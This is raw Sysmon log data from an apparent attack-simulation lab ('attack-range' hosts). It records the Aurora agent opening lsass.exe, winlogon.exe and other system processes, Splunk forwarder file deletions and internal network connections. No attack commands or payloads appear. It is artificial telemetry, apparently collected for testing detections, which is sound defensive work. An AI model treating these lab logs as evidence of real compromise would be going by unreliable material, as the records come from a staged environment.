Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017523Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.567{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017522Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.560{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017521Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.552{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017520Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.544{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017519Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.541{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 23542300x800000000000000045040Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:43.660{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC0A8438C6EA62F2B4B5127E6102F21C,SHA256=4F420A0390300422F2E134D499715F18B22C9A4A183B38F275B4E867E63EB91E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017552Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:43.653{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFE400F60529C3954747A3282C275E80,SHA256=0166B91000543CA6553055D644FBFA9CE55FC764C63C7095ABB4E551A17AABD2,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000017551Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:41.078{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50139-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000045041Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:44.743{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D38BC8AEACDD8B02F53EA85E59303F3E,SHA256=53454347870E6E42F5AE28D93654EFB8C99CACE4ABAD3C77DA5679269EAB27D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017553Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:44.746{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEB23EECD2B38D6D540F185237AB69A0,SHA256=656D5A1EE6FA217ADE45EF8A1749F6778A2C7DDC6F12A6507AF08C4892B74AF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045042Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:45.830{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBC446D6B836BD39235AF7DA7B23331E,SHA256=F9A2A0C26FE4A07C37301DF98FCE136434FF4B13E152E89AE40699586F8A1039,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017554Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:45.823{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=146C97405CCE5F7A6A5F16A8C12F6751,SHA256=B3EF9117E36DA787A1900455633D5B758FD5CB997E375E87DE9FDC7D0065A266,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045043Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:46.922{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE16DA14BD09DD6FE8A6D19ED5C0DE92,SHA256=206740F58F8F513469BF119D4138D8CE9520A294BF4DD63733D7F3549014E595,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017555Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:46.907{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83B382CF37D60A7509139CA33A2DDDB6,SHA256=408B18B1F161E62C5BBA8974998529CAE0FE2B8FCA921FEE33271D50C3811403,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017556Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:47.988{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B71F7D96EB30DDCBED4ED7D71379AA45,SHA256=6C282009E66162BEFF7D7BA339F1359CDA950C57AD5F61DF865FE34B11CCD48E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000045044Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:45.651{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56410-false10.0.1.12-8000- 23542300x800000000000000045045Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:48.030{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5957DFB3A46F73A3A658E2E39E697E79,SHA256=8EB9ABAC74E250426B3BEAD7041065C141BB2BAF19621028322C549CF3127A1F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000017557Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:46.986{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50140-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017558Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:49.073{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B3B77C6AB48A07F57A817B16B26FCBA,SHA256=9EB490519B5BAB681C540B2F96A2D0DCC4EAB05C55F1623C6FA97C821AC814E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045046Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:49.123{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D732D7383DD008B8F403A0C5C99F6899,SHA256=CA4C960D881CC11E9A652B679C367C18AF565B8CF3D781A81C391D3CBB7050D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045047Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:50.219{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=422D01B73D942B61C87BFB7B3E742F25,SHA256=1BE96714BE70EA1CEFA837C99D2845167D2730FE0B29BE9B7FFA4053CF93633D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017559Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:50.169{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3D77D22FC7E230EF825680F4A16AF38,SHA256=6C656DC4ECC329BA1EDE61EBC750230CEE051FA61FA5B0FE1BF13BE1E446A66B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017560Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:51.262{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3916FE3DD219E5135409D3EFB4CE03FB,SHA256=25E3159A9328E6377FEE100B35AF32C4EBC45B52EAAC9C9DDA63E2578C59D3A5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045072Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:51.891{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045071Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:51.889{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045070Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:51.884{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045069Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:51.883{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045068Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:51.879{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045067Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:51.869{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045066Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:51.864{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045065Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:51.858{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045064Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:51.856{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045063Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:51.854{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045062Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:51.850{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045061Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:51.818{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045060Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:51.814{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045059Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:51.809{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045058Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:51.798{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program 